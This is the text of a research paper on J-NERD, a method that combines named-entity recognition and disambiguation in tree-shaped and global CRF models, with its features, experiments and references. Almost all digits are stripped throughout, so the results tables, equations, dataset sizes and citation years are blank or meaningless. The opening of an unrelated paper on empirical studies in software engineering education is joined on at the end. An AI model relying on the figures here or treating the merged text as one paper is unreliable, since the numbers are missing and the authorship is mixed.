idf denotes inverse document frequencies (croft et al., ). the tf values are obtained from the in- put document at hand; the idf values are estimated from a large wikipedia text dump. token context of tokens. for a given token toki, all tokens tokj in the same input document form the token context and are associated with their tf- idf scores. thus, all tokens in the same document have identical token contexts. linguistic context of tokens. 
for all pars- ing dependencies, in which a token toki oc- curs, we treat the dependency type and the other argument of the dependency as linguistic pat- terns and compute their frequencies in the doc- ument (tf) and their inverse document frequen- cies in the wikipedia corpus (idf). in the ex- ample sentence “david played for manu, real, and la galaxy”, the linguistic context of the to- ken “manu” consists of the stanford parser depen- dencies prep for[played, manu], conj and[manu, real], and conj and[manu, galaxy]. this leads to the patterns prep for[played, ∗], conj and[∗, real], and conj and[∗, galaxy] with wildcards ∗, for which we compute tf-idf scores. token context of entities. for each candidate entity enti, we extract all tokens from keyphrases associated with enti and compute tf-idf scores for these tokens. the keyphrases are distilled from wikipedia link anchor texts (hoffart et al., ) and are part of the yago knowledge base. for example, the entity david beckham has keyphrases such as “player of the year”, “cham- pions league final”, “manchester united”, etc. thus, we compute tf-idf statistics for tokens like “player”, “year”, “champions”, etc. linguistic context of entities. for a candi- date entity enti, we extract all linguistic pat- terns (with tf-idf scores) where enti occurs from the wikipedia corpus. the result of parsing the wikipedia corpus by a dependency tool is saved in our database. . mention candidates & entity candidates to determine the candidate mentions in a token se- quence, we first perform exact-match lookups of all sub-sequences against the name-entity dictio- nary. as an option (and by default), this can be limited to sub-sequences that are tagged as noun phrases by the stanford parser. for higher recall, we then add partial-match lookups where a token sub-sequence matches only some but not all to- kens of an entity name in the dictionary. for ex- ample, for the sentence “david played for manu, real and la galaxy”, we obtain “david”, “manu”, “real”, “la galaxy”, “la”, and “galaxy” as candi- date mentions. this process yields features; our crf model then learns how to determine the ac- tual mention boundaries. the entity candidates then are simply all enti- ties that are associated with at least one of the can- didate mentions. as we include highly ambigu- ous mentions and the knowledge base contains thousands of candidate entities for some mentions, we use pruning heuristics to restrict the candidate space. for each candidate mention, we consider only the top k (using k = in our experiments) highest ranked entities. the ranking is based on the string similarity between the mention and the primary entity name, the prior popularity of the en- tity, and the local context similarity (feature func- tions f ,f ,f in section ). for each candidate mention, we add a virtual entity out-of-kb (out of knowledge base) to the entity candidate space, to prepare for the possi- ble situation that the mention actually denotes an emerging or long-tail entity that is not contained in the knowledge base at all. we compute the token context of a mention-specific out-of-kb entity, for a given mention token toki, based on the method of (hoffart et al., ). first, we form the set union of the token contexts of all candidate entities for toki, and subtract this union from the token context of toki. 
second, we compute tf-idf scores for the remaining tokens, using the idf esti- mates from wikipedia (as for all other tokens) and setting tf to (as the out-of-kb entity is not observable). feature space we define feature templates f –f for computing the ner type and the ned label of a token toki that denotes or is part of a mention. the bound- aries of a mention, i.e., its token span, are then triv- ially derived by combining adjacent tokens with the same ner type label (and disregarding all to- kens with label “other”). let posi be the pos tag of toki, dici is the ner tag from the dictionary lookup of toki, and depi is the parsing dependency that con- nects toki with another token. we write suri = 〈toki− , toki, toki+ 〉 to refer to the sequence of tokens surrounding toki. if lemmatization is en- abled, toki can be replaced by lemi. next, let ci be the set of candidate entities for all possible mentions that contain token toki. finally, let d be the domain which the input text is classified into (see section ) for a given training corpus (e.g., the conll- yago training set), the feature templates are expanded into concrete features, considering also background dictionaries and knowledge-base statistics. some of these are boolean fea- tures, others are real-valued. the boolean fea- tures (f ,f ,f ,f ,f ,f ,f ,f ,f ) capture the presence or absence of features like tokens, pos tags, dependency types, dictionary entries in a given input document on which we want to run end-to-end nerd. the real-valued features (f ,f ,f ,f ,f ,f ,f ,f ) capture similar- ity and relatedness measures between tokens, do- mains, or entities; these measures are precom- puted on background resources like dictionaries and knowledge bases. these features are partic- ularly crucial for ned, which needs to cope with many thousands of possible output labels (the en- tities for the mentions in a text). . standard features token-type prior. this feature f captures a prior probability of toki being of ner type typej. these probabilities are estimated from ner-annotated corpora. in our experiments, we use the training subsets of different test corpora, where training and test data are disjoint. for exam- ple, we may have a prior f (“ltd.”, org) = . . current pos. the feature template f (toki,posi, typej) generates binary fea- tures for all training-corpus tokens toki with part-of-speech tag posi and ner label typej. for the same token, multiple features may be generated: for example, if token “real” occurs in the training corpus in the phrase “real (jj) madrid (nn)”, this generates features f (toki, jj, org) and f (toki, jj, loc), etc. when later observing token toki in an input document, the feature (toki,posi, typej) is set to if toki has pos tag posi and typej is one of the corresponding ner types in the training corpus. in the rest of this section, binary features are generated from feature templates analogously. in-dictionary. the feature template f (toki,dici, typej) generates binary features if toki is in the name-entity dictionary for some entity of ner type typej. uppercase. the feature template f (toki, typej) generates binary features if toki appears in upper- case form and is ner-labeled as typej in the train- ing corpus. surrounding pos. the feature template f (toki,suri, typej) generates binary features if token toki and the pos tag sequence of its surrounding tokens suri appear in the training corpus where toki has ner label typej. surrounding tokens. 
the feature template f (toki,suri, typej) generates binary features if token toki has ner type typej given that toki ap- pears with surrounding tokens suri in an ner- annotated training corpus. this could possibly lead to a huge number of features. for tractabil- ity, we thus ignore sequences that only occur once in the training corpus. surrounding in-dictionary. the feature tem- plate f (toki,suri, typej) performs dictionary lookups for surrounding tokens in suri. similar to f , it generates binary features if toki and the dictionary lookup sequence of its surrounding to- kens suri appear in the training corpus where toki has ner type typej. token-entity prior. the real-valued feature f captures a prior probability of toki being entity entj. the probabilities are estimated from the occurrence frequencies of name-entity pairs in the background corpus, harnessing link anchor texts in wikipedia. for example, we may have a prior f (“beckham”,david beckham) = . as he is more popular (today) than his wife victoria. on the other hand, f (“david”,david beckham) would be lower than f (“david”,david bowie), for example, as this still active pop star is more frequently and prominently mentioned than the retired football player. token-entity n-gram similarity. the real- valued feature f measures the jaccard similar- ity of character-level n-grams a name in the dic- tionary that includes toki and the primary (i.e., full and most frequently used) name of an en- tity entj. for example, for n = the value of f (“becks”,david beckham) is . in experi- ments we set n = . token-entity token contexts. the real-valued feature f measures the weighted overlap similar- ity between the token contexts (tok-cxt) of token toki and entity entj. we use a weighted gener- alization of the standard overlap coefficient, wo, between two sets x,y of weighted elements, xk and yk. wo(x,y ) = ∑ k min(xk,yk) min( ∑ k xk, ∑ k yk) for our setting of token contexts, the weights are tf-idf scores, hence: f (toki,entj) = wo ( tok-cxt(toki), tok-cxt(entj) ) entity-entity token coherence. the real-valued feature f measures the coherence between the token contexts of two entity candidates enti and entj. f (toki,entj) = wo ( tok-cxt(enti), tok-cxt(entj) ) for example, entities david beckham and manchester united are highly coherent as they share many tokens in their contexts, such as “champions”, “league”, “premier”, “cup”, etc. thus, they should be chosen together. . domain features we use wordnet domains, created by (miller, ; magnini and cavagli, ; bentivogli et al., ), to construct a hierarchical taxonomy of domains such as politics, economy, sports, sci- ence, medicine, biology, art, music, etc. we com- bine the domains with semantic types (classes of entities) provided by yago , by assigning them to their respective domains. this is based on the manual assignment of wordnet synsets to do- mains by (magnini and cavagli, ; bentivogli et al., ), and extends to additional types in yago . for example, singer is assigned to mu- sic, and football player to football, a sub-domain of sports. these types include the standard ner types person (pers), organization (org), loca- tion (loc), and miscellaneous (misc) which are further refined by the yago subclassof hierar- chy. in total, the domains are enhanced with ca. , types imported from yago . j-nerd classifies input texts onto domains by means of “easy mentions”. an easy mention is a match in the name-entity dictionary for which there are at most three candidate entities (nguyen et al., ). 
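before moving on, a brief aside on the weighted overlap coefficient wo introduced above for the context-similarity and coherence features: the sketch below shows how it can be computed. it is illustrative only, with invented tf-idf weights and hypothetical context contents.

```python
def weighted_overlap(x, y):
    """Weighted overlap wo(x, y) between two weighted bags.

    x, y: dicts mapping context elements (tokens or parsing patterns)
    to non-negative tf-idf weights.
    """
    shared = sum(min(x[k], y[k]) for k in x.keys() & y.keys())
    smallest = min(sum(x.values()), sum(y.values()))
    return shared / smallest if smallest > 0 else 0.0

# hypothetical contexts with made-up tf-idf weights, for illustration only
mention_ctx = {"champions": 2.1, "league": 1.7, "played": 0.9}
entity_ctx = {"champions": 1.5, "league": 1.3, "manchester": 2.4, "united": 2.2}
print(weighted_overlap(mention_ctx, entity_ctx))  # (1.5 + 1.3) / 4.7 ≈ 0.60
```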
although the mention set is not ex- plicitly given before running nerd, j-nerd still can extract “easy mentions” from the entirety of all mention candidates. let c∗ be the set of candidate entities for easy mentions in the input document. for each domain d, we compute the coherence of the easy mentions m∗ = {m ,m , . . .} coh(m∗) = |c∗ ∩cd| |c∗| where cd is the set of all entities under domain d. we classify the document into the domain with the highest coherence score. although, the mentions and their entities may be inferred incorrectly, the domain classification still tends to work very reliably as it aggregates over all “easy” mention candidates. the following feature templates exploit domains. entity-domain coherence. this feature captures the coherence between an entity candidate entj and the domain d which the input text is classified into. that is, f (d,entj) = if d ∈ dom(entj). otherwise, the feature value is . entity-entity type coherence. this feature computes the relatedness between the wikipedia categories of two candidate entities enti ∈ ci, entj ∈ cj. f (enti,entj) = maxcu∈cat(enti) cv∈cat(entj) rel(cu,cv) where the function rel(cu,cv) computes the re- ciprocal length of the shortest path between cat- egories cu,cv in the domain taxonomy (nguyen et al., ). recall that our domain taxonomy con- tains hundred thousands of wikipedia categories integrated in the yago type hierarchy. . linguistic features linguistic pattern from dependency parsing. recall that we obtain dependency-parsing patterns by using wikipedia as a large background corpus. here we harness that wikipedia contains many mentions with explicit links to entities and that the knowledge base provides us with the ner types for these entities. typed-dependency. the feature template f (toki,depi, typej) generates binary features if the background corpus contains the pattern depi = deptype(arg ,arg ) where toki is ei- ther arg or arg and toki is labeled with ner type typej. for example, with token “manu” in our example sentence “david played for manu, real, and la galaxy”, a feature gener- ated from a similar sentence in wikipedia would be f (toki, prep for(“played”,∗), org). typed-dependency/pos. this feature template f (toki,posi,depi, typej) captures linguistic patterns that combine parsing dependencies (like in f ) and pos tags (like in f ), learned from an annotated training corpus. it generates binary features if toki appears in the dependency pattern depi with pos tag posi and this configuration also occurs in the training data with ner label typej. typed-dependency/in-dictionary. the feature template f (toki,dici,depi, typej) captures lin- guistic patterns that combine parsing dependen- cies (like in f ) and dictionary lookups (like in f ), learned from an annotated training corpus. it generates binary features if toki appears in the de- pendency pattern depi and has an entry dici in the name-entity dictionary for some entity with ner label typej. token-entity linguistic contexts. the real- valued feature f measures the weighted overlap between the linguistic contexts (ling-cxt) of token toki and entity entj. f (toki,entj) = wo ( ling-cxt(toki), ling-cxt(entj) ) graphical models the crf models that j-nerd uses for its infer- ence are initially constructed on a per-sentence ba- sis. these local crf’s are then combined into a global model by adding non-local links to capture cross-sentence dependencies (finkel et al., ) among mentions in different sentences (as illus- trated in figure ). . 
linear-chain model

in the local setting, j-nerd works on each sentence s = 〈tok_1, . . . , tok_m〉 separately. we construct a linear-chain crf (see figure ) by introducing an observed variable x_i for each token tok_i that represents a proper word. for each x_i, we additionally introduce a variable y_i representing the combined nerd labels. as in any crf, the x_i,y_i and y_i,y_{i+1} pairs are connected via factors, whose weights we obtain from the feature functions described in section .

figure : linear-chain crf.

. tree model

the factor graph for the tree model (see figure ) extends the linear-chain model by adding a factor linking each pair of labels y_i,y_j whenever these tokens have a typed dependency obtained from the stanford parser. figure shows an example for the tree-shaped model.

figure : tree model. ([p f] is [prep for])

. global models

following (finkel et al., ) for the global setting, we consider an entire input text, consisting of multiple sentences s_1, . . . , s_n = 〈tok_1, . . . , tok_m〉, for the construction of both the linear-chain model and the tree model. as shown in figure , cross-sentence edges among pairs of labels y_i,y_j are introduced for candidate sets c_i,c_j that share at least one candidate entity, such as "david" and "david beckham". additionally, we introduce factors for all pairs of tokens in adjacent mentions within the same sentence, such as "david" and "manu".

figure : global model, linking two tree models. ([p f] is [prep for])

. inference & learning

for a given sequence of observed variables 〈x_1, . . . , x_m〉, let l denote a sequence of nerd labels 〈y_1, . . . , y_m〉, where each y_i consists of an ner type type_i and an ned label ent_i. our inference objective is to find the most probable sequence l∗. this goal is expressed by the following function:

l∗ = arg max_{y_1 . . . y_m} exp( ∑_{t=1}^{m} ∑_{k=1}^{K} λ_k feature_k(y_t, y_prev(t), x_1 . . . x_m) )

where

• feature_1..K are features generated from feature templates f .. of section ,
• prev(t) is the index of the label y_j that y_t depends on, i.e., the previous index (t − 1) in linear-chain models or the parent index in tree models,
• and λ_k are feature weights, i.e., model parameters to be learned.

the number of generated features, k, depends on the training corpus and the choice of the crf model. for the conll-yago training set, the tree models have k = , parameters. given a trained model, exact inference with respect to the above objective function can be efficiently performed by variants of the viterbi algorithm (sutton and mccallum, ) for the local models, both linear and tree models. for the global models, however, exact solutions are computationally intractable. therefore, we employ gibbs sampling to approximate the solution.

as for model parameters, j-nerd learns the feature weights λ_k from the training data by maximizing a respective conditional likelihood function (sutton and mccallum, ), using a variant of the l-bfgs optimization algorithm (liu and nocedal, ). we do this for each local crf model (linear and tree models), and apply the same learned weights to the corresponding global models. our implementation uses the riso toolkit for belief networks.

experiments

. setup

. .
test data collections our evaluation is mainly based on the conll- yago corpus of newswire articles. additionally, we report on experiments with an extended version of the ace- corpus and a large sample of the entity-annotated clueweb’ -facc web crawl. conll-yago is derived from the conll- http://riso.sourceforge.net/ yago corpus (hoffart et al., ) by remov- ing tables where mentions in table cells do not have linguistic context, a typical example being sports results. the resulting corpus contains , documents with , mentions including , out-of-kb entities. ground-truth entities in yago are provided by (hoffart et al., ). for consistent ground-truth, we derived the ner types from the ned ground-truth entities, this way fix- ing some errors in the original annotations related to metonymy (e.g., labeling the mentions in “india beats pakistan : ” incorrectly as loc, whereas the entities are the sports teams of type org). this makes the dataset not only cleaner but also more demanding, as metonymous mentions are among the most difficult cases. for the evaluation we use the “testb” subset of conll-yago, which – after the removal of ta- bles – has documents with , mentions including , out-of-kb entities. the other , documents with a total of , mentions (including , out-of-kb mentions) are used for training. ace is an extended variant of the ace cor- pus , with additional ned labels by (bentivogli et al., ). we consider only proper entities and exclude mentions of general concepts such as “revenue”, “world economy”, “financial crisis” etc., as they do not correspond to individual enti- ties in a knowledge base. this reduces the number of mentions, but gives the task a crisp focus. we disallow overlapping mention spans and consider only maximum-length mentions, following the ra- tionale of the erd challenge . the test set contains documents with , mentions. clueweb contains two randomly sampled subsets of the clueweb’ -facc corpus with freebase annotations: https://www.mpi-inf.mpg.de/departments/ databases-and-information-systems/research/ yago-naga/aida/downloads/ http://projects.ldc.upenn.edu/ace/ http://lemurproject.org/clueweb /facc / • clueweb: , documents ( , men- tions) each with at least entities . • clueweblong−tail: , documents ( , mentions) each with at least long-tail enti- ties. we consider an entity to be “long-tail” if it has at most incoming links in the english wikipedia. note that these web documents are very different in style from the news-centric articles in conll and ace. also note that the entity markup is au- tomatically generated, but with emphasis on high precision. so the data captures only a small subset of the potential entity mentions, and it may contain a small fraction of false entities. in addition to these larger test corpora, we ran experiments with several small datasets used in prior works: kore (hoffart et al., ), msnbc (cucerzan, ), and a subset of aquaint (milne and witten, ). each of these has only a few hundred mentions, but they exhibit different characteristics. the findings on these datasets are fully in line with those of our main experiments; hence no explicit results are presented here. in all these test datasets, the ground-truth con- siders only individual entities and excludes gen- eral concepts, such as “climate change”, “har- mony”, “logic”, “algebra”, etc. these proper enti- ties are identified by the intersection of wikipedia articles and yago entities. this way, we fo- cus on nerd. 
systems that are designed for the broader task of “wikification” are not penalized by their (typically lower) performance on inputs other than proper entity mentions. . . methods under comparison we compare j-nerd in its four variants (linear vs. tree and local vs. global) to various state-of- the-art ner/ned methods. for ner (i.e., mention boundaries and types) we use the recent version . . of the stanford ner tagger (finkel et al., ) as a base- line. this version has ner benchmark results on conll’ that are as good as those reported in ratinov and roth ( ) and passos et al. ( ). we retrained this model by using the same corpus- specific training data that we use for j-nerd . for ned, we compared j-nerd against the following methods for which we obtained open- source software or could call a web service: nlp.stanford.edu/software/crf-ner.shtml • berkeley-entity (durrett and klein, ) is a joint model for coreference resolution, ner and ned with linkage to wikipedia. • aida-light (nguyen et al., ) is an opti- mized variant of the aida system (hoffart et al., ), based on yago . it uses the stan- ford tool for ner. • tagme (ferragina and scaiella, ) is a wikifier that maps mentions to entities or con- cepts in wikipedia. it uses a wikipedia- derived dictionary for ner. • spotlight (mendes et al., ) links mentions to entities in dbpedia. it uses the lingpipe dictionary-based chunker for ner. some systems use confidence thresholds to de- cide on when to map a mention to out-of-kb. for each dataset, we used withheld data to tune these system-specific thresholds. figure il- lustrates the sensitivity of the thresholds for the conll-yago dataset. figure : f for varying confidence thresholds. . . evaluation measures we evalute the output quality at the ner level alone and for the end-to-end nerd task. we do not evaluate ned alone, as this would require giv- ing a ground-truth set of mentions to the systems under test to rule out that ner errors affect ned. most competitors do not have interfaces for such a controlled ned-only evaluation. each test collection has ground-truth annota- tions (g) consisting of text spans for mentions, ner types of the mentions, and mapping men- tions to entities in the kb or to out-of-kb. re- call that the out-of-kb case captures entities that are not in the kb at all. let x be the out- put of system x: detected mentions, ner types, ned mappings. following the erd chal- lenge (carmel et al., ), we define precision and recall of x for end-to-end nerd as: prec(x) = |x agrees with g| |x| rec(x) = |x agrees with g| |g| where agreement means that x and g overlap in the text spans (i.e. have at least one token in common) for a mention, have the same ner type, and have the same mapping to an entity or out-of-kb. the f score of x is the harmonic mean of precision and recall. for evaluating mention boundary detection alone, we consider only the overlap of text spans; for evaluating ner completely, we consider both mention overlap and agreement on ner type. . results for conll-yago our first experiment on conll-yago is com- paring the four crf variants of j-nerd for three tasks: mention boundary detection, ner typing and end-to-end nerd. then, the best model of j-nerd is compared against various baselines and a pipelined configuration of our method. fi- nally, we test the influence of different features groups. . . experiments on crf variants table : experiments on conll-yago . perspective variants prec rec f mention boundary detection j-nerdlinear-local . . . j-nerdtree-local . 
. . j-nerdlinear-global . . . j-nerdtree-global . . . ner typing j-nerdlinear-local . . . j-nerdtree-local . . . j-nerdlinear-global . . . j-nerdtree-global . . . end-to-end nerd j-nerdlinear-local . . . j-nerdtree-local . . . j-nerdlinear-global . . . j-nerdtree-global . . . table shows that all variants perform very well on boundary detection and ner typing, with small differences only. for end-to-end nerd, however, j-nerdtree-global outperforms all other variants by a large margin. this results in achiev- ing the best f score of . %, which is . % higher than j-nerdlinear-global. we performed a paired t-test between these two variants, and ob- tained a p-value of . . the local variants of j- nerd lose around % of f because they do not capture the coherence among mentions in different sentences. in the rest of our experiments, we therefore fo- cus on j-nerdtree-global and the task of end-to-end nerd. . . comparison of joint vs. pipelined models and baselines in this subsection, we demonstrate the benefits of joint models against pipelined models including state-of-the-art baselines. in addition to the com- petitors introduced in . . , we add a pipelined configuration of j-nerd , named p-nerd. that is, we first run j-nerd in ner mode (only con- sidering ner features f .. and f .. ). the best sequence of ner labels is then given to j-nerd to run in ned mode (only considering ned fea- tures f .. and f ). table : comparison between joint models and pipelined models on end-to-end nerd. method prec rec f p-nerd . . . j-nerd . . . aida-light . . . tagme . . . spotlight . . . the results are shown in table . j-nerd achieves the highest precision of . % for end- to-end nerd, outperforming all competitors by a large margin. this results in achieving the best f score of . %, which is . % higher than p- nerd and . % higher than aida-light. note that (nguyen et al., ) reported higher preci- sion for aida-light, but that experiment did not consider out-of-kb entities which pose an ex- tra difficulty in our setting. also, the test corpora – conll-yago vs. conll-yago – are not quite comparable (see above). tagme and spotlight are clearly inferior on this dataset (more than % lower in f than j- nerd). it seems these systems are more geared for efficiency and coping with popular and thus frequent entities, whereas the conll-yago dataset contains very difficult test cases. for the best f score of j-nerd, we performed a paired t-test against the other methods’ f values and determined a p-value of . . we also compared the ner performance of j-nerd against the state-of-the-art method for ner alone, the stanford ner tagger version . . . for mention boundary detection, j-nerd achieved an f score of . % versus . % by stanford ner and . % by p-nerd. for ner typing, j-nerd achieved an f score of . % versus . % by stanford ner and . % by p- nerd. so we could not outperform the best prior method for ner alone, but achieved very compet- itive results. here, we do not really leverage any form of joint inference (combining crf’s across sentences is used in stanford ner, too), but har- ness rich features on domains, entity candidates, and linguistic dependencies. . . influence of features to analyze the influence of the features, we per- formed an additional ablation study on the global j-nerd tree model, which is the best variant of j-nerd , as follows: • standard features only include features intro- duced in section . . • standard and domain features exclude the lin- guistic features f ,f ,f ,f . 
• standard and linguistic features excludes the domain features f and f . • all features is the full-fledged j-nerdtree-global model. table : feature influence on conll-yago . perspective setting f ner typing standard features . standard and domain features . standard and linguistic features . all features . end-to-end nerd standard features . standard and domain features . standard and linguistic features . all features . table shows the results, demonstrating that linguistic features are crucial for both ner and nerd. for example, in the sentence “woolmer played tests for england”, the mention “eng- land” refers to an organization (the english cricket team), not to a location. the dependency-type fea- ture prep for[play, england] is a decisive cue to handle such cases properly. domain features help in ned to eliminate, for example, football teams when the domain is cricket. . end-to-end nerd on ace for comparison to the recently developed berkeley-entity system (durrett and klein, ), the authors of that system provided us with detailed results for the entity-annotated ace’ corpus, which allowed us to discount non-entity (so-called “nom-type”) mappings (see subsection . . ). all other systems, including the best j-nerd method, were run on the corpus under the same conditions. table : nerd results on ace. method prec rec f p-nerd . . . j-nerd . . . berkeley-entity . . . aida-light . . . tagme . . . spotlight . . . j-nerd outperforms p-nerd and berkeley- entity: f scores are . % and . % better, re- spectively, with a t-test p-value of . (table ). following these three best-performing systems, aida-light also achieves decent results. the other systems show substantially inferior performance. the performance gains that j-nerd achieves over berkeley-entity can be attributed to two fac- tors. first, the rich linguistic features of j-nerd help to correctly cope with some difficult cases, e.g., when common nouns are actually names of people. second, the coherence features of global j-nerd help to properly couple decisions on re- lated entity mentions. . end-to-end nerd on clueweb the results for clueweb are shown in table . again, j-nerd outperforms all other systems with a t-test p-value of . . the differences be- tween j-nerd and fast ned systems such as tagme or spotlight become smaller as the num- ber of prominent entities (i.e., prominent people, organizations and locations) is higher on clueweb than on conll-yago . table : nerd results on clueweb. dataset method prec rec f clueweb p-nerd . . . j-nerd . . . aida-light . . . tagme . . . spotlight . . . clueweblong−tail p-nerd . . . j-nerd . . . aida-light . . . tagme . . . spotlight . . . conclusions we have shown that coupling the tasks of ner and ned in a joint crf model is beneficial. our j-nerd method outperforms strong baselines on a variety of test datasets. the strength of j-nerd comes from three novel assets. first, our tree crf’s capture the structure of dependency parse trees, and we couple multiple of such tree mod- els across sentences. second, we harness non- standard features about domains and novel fea- tures for linguistic patterns derived from parsing. third, our joint inference maintains uncertain can- didates for both mentions and entities and makes decisions as late as possible. in our future work, we plan to explore use cases for joint nerd, espe- cially for content analytics over news streams and social media. references luisa bentivogli, pamela forner, bernardo magnini, and emanuele pianta. . 
revising the wordnet domains hierarchy: semantics, coverage and bal- ancing. in proceedings of the workshop on multi- lingual linguistic ressources, mlr ’ , pages – . acl. luisa bentivogli, pamela forner, claudio giu- liano, alessandro marchetti, emanuele pianta, and kateryna tymoshenko. . extending en- glish ace corpus annotation with ground- truth links to wikipedia. in the people’s web meets nlp: collaboratively constructed semantic resources ’ , pages – . coling. razvan bunescu and marius pasca. . using encyclopedic knowledge for named entity disam- biguation. in eacl ’ , pages – . acl. david carmel, ming-wei chang, evgeniy gabrilovich, bo-june paul hsu, and kuansan wang. . erd’ : entity recognition and disambiguation challenge. in sigir ’ , page . acm. marco cornolti, paolo ferragina, and massimiliano ciaramita. . a framework for benchmark- ing entity-annotation systems. in www ’ , pages – . acm. marco cornolti, paolo ferragina, massimiliano cia- ramita, hinrich schütze, and stefan rüd. . the smaph system for query entity recognition and disambiguation. in proceedings of the first inter- national workshop on entity recognition and dis- ambiguation, erd ’ , pages – . acm. bruce croft, donald metzler, and trevor strohman. . search engines: information retrieval in practice. addison-wesley publishing company. silviu cucerzan. . large-scale named en- tity disambiguation based on wikipedia data. in emnlp-conll ’ , pages – . acl. silviu cucerzan. . name entities made obvious: the participation in the erd evaluation. in proceedings of the first international workshop on entity recognition and disambiguation, erd ’ , pages – . acm. hamish cunningham, diana maynard, kalina bontcheva, et al. . text processing with gate. university of sheffield. joachim daiber, max jakob, chris hokamp, and pablo n. mendes. . improving efficiency and accuracy in multilingual entity extraction. in pro- ceedings of the th international conference on se- mantic systems, i-semantics ’ , pages – . acm. marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the international conference on language resources and evaluation, lrec ’ , pages – . elra. stephen dill, nadav eiron, david gibson, et al. . semtag and seeker: bootstrapping the semantic web via automated semantic annotation. in www ’ , pages – . acm. greg durrett and dan klein. . a joint model for entity analysis: coreference, typing, and linking. in tacl ’ . acl. paolo ferragina and ugo scaiella. . tagme: on-the-fly annotation of short text fragments (by wikipedia entities). in cikm ’ , pages – . acm. jenny rose finkel, trond grenager, and christopher manning. . incorporating non-local informa- tion into information extraction systems by gibbs sampling. in acl ’ , pages – . acl. michael fleischman and eduard hovy. . fine grained classification of named entities. in col- ing ’ , pages – . acl. johannes hoffart, mohamed amir yosef, ilaria bor- dino, hagen fürstenau, manfred pinkal, marc span- iol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in emnlp ’ , pages – . acl. johannes hoffart, stephan seufert, dat ba nguyen, martin theobald, and gerhard weikum. . kore: keyphrase overlap relatedness for entity disambiguation. in cikm ’ , pages – . acm. johannes hoffart, fabian m. suchanek, klaus berberich, and gerhard weikum. . yago : a spatially and temporally enhanced knowledge base from wikipedia. ai vol. 
, pages – . johannes hoffart, yasemin altun, and gerhard weikum. . discovering emerging entities with ambiguous names. in www ’ , pages – . acm. daphne koller, nir friedman, lise getoor, and ben- jamin taskar. . graphical models in a nut- shell. in an introduction to statistical relational learning. mit press. sayali kulkarni, amit singh, ganesh ramakrishnan, and soumen chakrabarti. . collective annota- tion of wikipedia entities in web text. in kdd ’ , pages – . acm. xiao ling and daniel s. weld. . fine-grained entity recognition. in aaai ’ . aaai press. dong c. liu and jorge nocedal. . on the limited memory bfgs method for large scale optimiza- tion. mathematical programming vol. , pages – . bernardo magnini and gabriela cavagli. . inte- grating subject field codes into wordnet. in proceed- ings of the international conference on language resources and evaluation, lrec ’ , pages – . elra. andrew mccallum and wei li. . early re- sults for named entity recognition with condi- tional random fields, feature induction and web- enhanced lexicons. in hlt-naacl ’ , pages – . acl. edgar meij, wouter weerkamp, and maarten de rijke. . adding semantics to microblog posts. in proceedings of the fifth acm international confer- ence on web search and data mining, wsdm ’ , pages – . acm. pablo n. mendes, max jakob, andrés garcı́a-silva, and christian bizer. . dbpedia spotlight: shedding light on the web of documents. in proceedings of the th international conference on semantic systems, i-semantics ’ , pages – . acm. george a. miller. . wordnet: a lexical database for english. pages – . acm. david milne and ian h. witten. . learning to link with wikipedia. in cikm ’ , pages – . acm. david milne and ian h. witten. . an open-source toolkit for mining wikipedia. artificial intelligence vol. , pages – . ndapandula nakashole, tomasz tylenda, and gerhard weikum. . fine-grained semantic typing of emerging entities. in acl ’ , pages – . acl. dat ba nguyen, johannes hoffart, martin theobald, and gerhard weikum. . aida-light: high- throughput named-entity disambiguation. in pro- ceedings of the workshop on linked data on the web, ldow ’ . ceur-ws.org. alexandre passos, vineet kumar, and andrew mccal- lum. . lexicon infused phrase embeddings for named entity resolution. in proceedings of the eigh- teenth conference on computational natural lan- guage learning, conll ’ , pages – . acl. altaf rahman and vincent ng. . inducing fine- grained semantic classes via hierarchical and col- lective classification. in coling ’ , pages – . acl. lev ratinov and dan roth. . design challenges and misconceptions in named entity recognition. in conll ’ , pages – . acl. lev ratinov, dan roth, doug downey, and mike an- derson. . local and global algorithms for dis- ambiguation to wikipedia. in hlt ’ , pages – . acl. avirup sil and alexander yates. . re-ranking for joint named-entity recognition and linking. in cikm ’ , pages – . acm. valentin i. spitkovsky and angel x. chang. . a cross-lingual dictionary for english wikipedia concepts. in proceedings of the international conference on language resources and evaluation, lrec ’ . elra. charles a. sutton and andrew mccallum. . an introduction to conditional random fields. foun- dations and trends in machine learning vol. , pages – . ricardo usbeck, michael röder, axel-cyrille ngonga ngomo, et al. . gerbil – general entity anno- tation benchmark framework. in www ’ . acm. mohamed amir yosef, sandro bauer, johannes hof- fart, marc spaniol, and gerhard weikum. . 
hyena: hierarchical type classification for entity names. in coling ’ , pages – . acl. submitted november accepted august published september corresponding author fabian fagerholm, fabian.fagerholm@helsinki.fi academic editor perdita stevens additional information and declarations can be found on page doi . /peerj-cs. copyright fagerholm et al. distributed under creative commons cc-by . open access guidelines for using empirical studies in software engineering education fabian fagerholm ,*, marco kuhrmann ,* and jürgen münch , ,* department of computer science, university of helsinki, helsinki, finland institute for applied software systems engineering, clausthal university of technology, goslar, germany herman hollerith center (hhz), reutlingen university, böblingen, germany * these authors contributed equally to this work. abstract software engineering education is under constant pressure to provide students with industry-relevant knowledge and skills. educators must address issues beyond exercises and theories that can be directly rehearsed in small settings. industry training has similar requirements of relevance as companies seek to keep their workforce up to date with technological advances. real-life software development often deals with large, software-intensive systems and is influenced by the complex effects of teamwork and distributed software development, which are hard to demonstrate in an educational environment. a way to experience such effects and to increase the relevance of software engineering education is to apply empirical studies in teaching. in this paper, we show how different types of empirical studies can be used for educational purposes in software engineering. we give examples illustrating how to utilize empirical studies, discuss challenges, and derive an initial guideline that supports teachers to include empirical studies in software engineering courses. furthermore, we give examples that show how empirical studies contribute to high-quality learning outcomes, to student motivation, and to the awareness of the advantages of applying software engineering principles. having awareness, experience, and understanding of the actions required, students are more likely to apply such principles under real-life constraints in their working life. subjects computer education, software engineering keywords software engineering education, computer science curricula, teaching methods, empirical studies, experimentation, education, guideline introduction providing relevant knowledge and skills is a continuous concern in software engineering education. students must be exposed to realistic settings to understand why applying fundamental software engineering principles is necessary, why decisions should be grounded in evidence, and to learn to foresee long-term and delayed effects of certain behaviour or decisions in software projects. using empirical instruments is one approach to teach relevant software engineering knowledge and skills. the goal of this paper is to use our teaching experiences to develop practice-grounded guidelines that help teachers include empirical instruments in their teaching. since real-life software development routinely deals with large, software-intensive systems and is influenced by the manifold and complex effects of teamwork and distributed how to cite this article fagerholm et al. ( ), guidelines for using empirical studies in software engineering education. peerj comput. sci. :e ; doi . /peerj-cs. 
